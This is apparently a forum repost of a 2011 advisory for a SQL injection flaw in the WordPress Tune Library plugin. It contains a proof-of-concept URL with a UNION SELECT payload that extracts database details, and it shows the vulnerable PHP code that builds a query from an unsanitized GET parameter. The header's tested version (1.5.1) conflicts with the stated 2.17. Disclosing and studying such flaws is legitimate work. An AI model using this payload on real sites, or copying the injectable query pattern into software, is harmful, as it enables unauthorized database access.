WordPress 调库插件 2.17 SQL 注入漏洞
# 漏洞名称: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability# 日期: 2011-09-10
# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# 软件下载: http://downloads.wordpress.org/plugin/tune-library.zip
# 版本: 1.5.1 (tested)
# 注释: magic_quotes has to be turned off
# Plugin setting “Filter artists by letter and show alphabetical navigation” has to be turned on
poc:
http://www.91***.org/wp-content/p ... -ajax.php?letter=-1 UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
---------------
Vulnerable code
---------------
$artistletter = $_GET['letter'];
...
if ($options['oneletter'] == false || $showallartists == true)
...
else
{
if ($artistletter == '#')
...
else
{
$querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
}
页:
[1]